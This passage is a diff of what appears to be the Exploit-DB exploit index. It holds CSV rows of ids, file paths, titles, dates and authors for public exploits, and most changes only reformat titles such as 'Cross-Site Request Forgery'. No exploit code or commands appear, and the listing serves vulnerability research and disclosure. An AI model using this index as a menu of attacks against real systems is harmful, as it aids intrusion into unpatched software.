-38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component 'index.php' - Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 +38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 38944,platforms/php/webapps/38944.txt,"Command School Student Management System /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38945,platforms/php/webapps/38945.txt,"Command School Student Management System /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38946,platforms/php/webapps/38946.txt,"Command School Student Management System /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35221,13 +35221,13 @@ id,file,description,date,author,platform,type,port 38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 39097,platforms/linux/remote/39097.txt,"Red Hat Piranha Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 -39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component 'index.php' - SQL Injection",2014-02-17,MR.XpR,php,webapps,0 +39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection",2014-01-13,"Rohan Stelling",php,webapps,0 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 39095,platforms/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,php,dos,0 38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 -38969,platforms/multiple/dos/38969.txt,"Adobe Flash Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0 -38970,platforms/multiple/dos/38970.txt,"Adobe Flash Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0 +38969,platforms/multiple/dos/38969.txt,"Adobe Flash - Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0 +38970,platforms/multiple/dos/38970.txt,"Adobe Flash - Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0 38971,platforms/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Path Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 38972,platforms/windows/dos/38972.html,"Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)",2015-12-14,"Moritz Jodeit",windows,dos,0 38973,platforms/multiple/remote/38973.rb,"Legend Perl IRC Bot Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 @@ -35269,8 +35269,8 @@ id,file,description,date,author,platform,type,port 39010,platforms/linux/local/39010.c,"Gentoo Local Priv Escalation in QEMU",2015-12-17,zx2c4,linux,local,0 39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 39016,platforms/php/webapps/39016.txt,"Joomla! Almond Classifieds Component - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 @@ -35343,7 +35343,7 @@ id,file,description,date,author,platform,type,port 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - CSRF",2015-12-23,"Curesec Research Team",php,webapps,80 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 -39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin 'upload.php' - Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 +39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 @@ -35365,8 +35365,8 @@ id,file,description,date,author,platform,type,port 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x - 'ajax.autosave.php' Multiple SQL Injection",2014-03-19,"Claepo Wang",php,webapps,0 -39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 -39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 +39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 +39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 @@ -35383,11 +35383,11 @@ id,file,description,date,author,platform,type,port 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root",2015-12-30,"Larry W. Cashdollar",linux,local,0 39135,platforms/php/webapps/39135.php,"WordPress Felici Theme - 'uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 -39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 Cross Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 +39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 -39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 +39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 -39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component 'index.php' - SQL Injection",2014-04-08,Lazmania61,php,webapps,0 +39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData - Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 @@ -35425,7 +35425,7 @@ id,file,description,date,author,platform,type,port 39173,platforms/php/webapps/39173.txt,"Caldera /costview2/jobs.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39174,platforms/php/webapps/39174.txt,"Caldera /costview2/printers.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0 -39176,platforms/php/webapps/39176.html,"TOA Cross Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 +39176,platforms/php/webapps/39176.html,"TOA Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 39177,platforms/multiple/dos/39177.py,"VLC Media Player - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0 39178,platforms/php/webapps/39178.txt,"CMS Touch pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 39179,platforms/php/webapps/39179.txt,"CMS Touch news.php News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 @@ -35447,8 +35447,8 @@ id,file,description,date,author,platform,type,port 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0 39197,platforms/php/webapps/39197.txt,"WordPress Booking System (Booking Calendar) Plugin 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps,0 -39198,platforms/php/webapps/39198.html,"User Cake Cross Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps,0 -39199,platforms/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross Site Request Forgery",2014-05-23,"Henri Salo",python,webapps,0 +39198,platforms/php/webapps/39198.html,"User Cake Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps,0 +39199,platforms/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",python,webapps,0 39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component SQL Injection",2014-05-24,"ali ahmady",php,webapps,0 39373,platforms/osx/dos/39373.c,"OS X Kernel - no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0 @@ -35458,11 +35458,11 @@ id,file,description,date,author,platform,type,port 39206,platforms/php/webapps/39206.txt,"webEdition CMS - 'we_fs.php' SQL Injection",2014-05-28,"RedTeam Pentesting GmbH",php,webapps,0 39207,platforms/linux/local/39207.txt,"dpkg Source Package Index: pseudo-header Processing Multiple Local Directory Traversal",2014-05-25,"Raphael Geissert",linux,local,0 39208,platforms/windows/dos/39208.c,"Microsoft Windows Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos,0 -39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router Cross Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 +39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 39210,platforms/php/webapps/39210.txt,"Seo Panel - 'file' Parameter Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 -39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 -39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 +39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 +39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash PoC",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 @@ -35532,22 +35532,22 @@ id,file,description,date,author,platform,type,port 39287,platforms/php/webapps/39287.txt,"WordPress WP Content Source Control Plugin - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps,0 39289,platforms/php/webapps/39289.txt,"ArticleFR - 'id' Parameter SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps,0 -39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module Cross Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 -39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin 'admin-ajax.php' - Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 +39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 +39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 and Thunderbird 3.1.20 Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 -39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 -39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 -39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 -39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 +39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 +39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 +39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 39306,platforms/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File CSRF",2016-01-25,"Aatif Shahdad",php,webapps,443 39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39308,platforms/linux/dos/39308.c,"Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 @@ -35555,10 +35555,10 @@ id,file,description,date,author,platform,type,port 39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 -39313,platforms/php/webapps/39313.txt,"Food Order Portal - 'admin_user_delete.php' Cross Site Request Forgery",2014-09-12,KnocKout,php,webapps,0 +39313,platforms/php/webapps/39313.txt,"Food Order Portal - 'admin_user_delete.php' Cross-Site Request Forgery",2014-09-12,KnocKout,php,webapps,0 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0 39315,platforms/hardware/dos/39315.pl,"Multiple Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",hardware,dos,0 -39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 +39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0 39319,platforms/php/webapps/39319.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 @@ -35573,7 +35573,7 @@ id,file,description,date,author,platform,type,port 39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,Metasploit,android,remote,5555 39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 -39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 +39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 39332,platforms/php/webapps/39332.txt,"Wiser Backup Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 @@ -35667,7 +35667,7 @@ id,file,description,date,author,platform,type,port 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash PoC",2016-02-09,"Shantanu Khandelwal",windows,dos,0 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC - .PNG File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - .PNG File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 -39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 +39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - .IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure",2016-02-10,Vulnerability-Lab,multiple,webapps,0 @@ -35840,7 +35840,7 @@ id,file,description,date,author,platform,type,port 39613,platforms/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39614,platforms/osx/dos/39614.c,"OS X Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 -39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 +39616,platforms/osx/dos/39616.c,"OS X Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 39623,platforms/php/webapps/39623.txt,"WordPress Photocart Link Plugin 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 @@ -35890,7 +35890,7 @@ id,file,description,date,author,platform,type,port 39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443 39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80 -39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80 +39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80 39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80 39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0 39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947 @@ -35909,7 +35909,7 @@ id,file,description,date,author,platform,type,port 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80 39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80 39698,platforms/windows/remote/39698.html,"Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0 -39699,platforms/windows/dos/39699.html,"Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free",2016-04-15,"Marcin Ressel",windows,dos,0 +39699,platforms/windows/dos/39699.html,"Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,Metasploit,linux,local,0 @@ -35952,7 +35952,7 @@ id,file,description,date,author,platform,type,port 39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 -39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 +39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross-Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 39745,platforms/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80 39746,platforms/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80 39747,platforms/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",linux,dos,0 @@ -36313,7 +36313,7 @@ id,file,description,date,author,platform,type,port 40150,platforms/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",php,webapps,80 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80 -40154,platforms/php/webapps/40154.txt,"PHP gettext 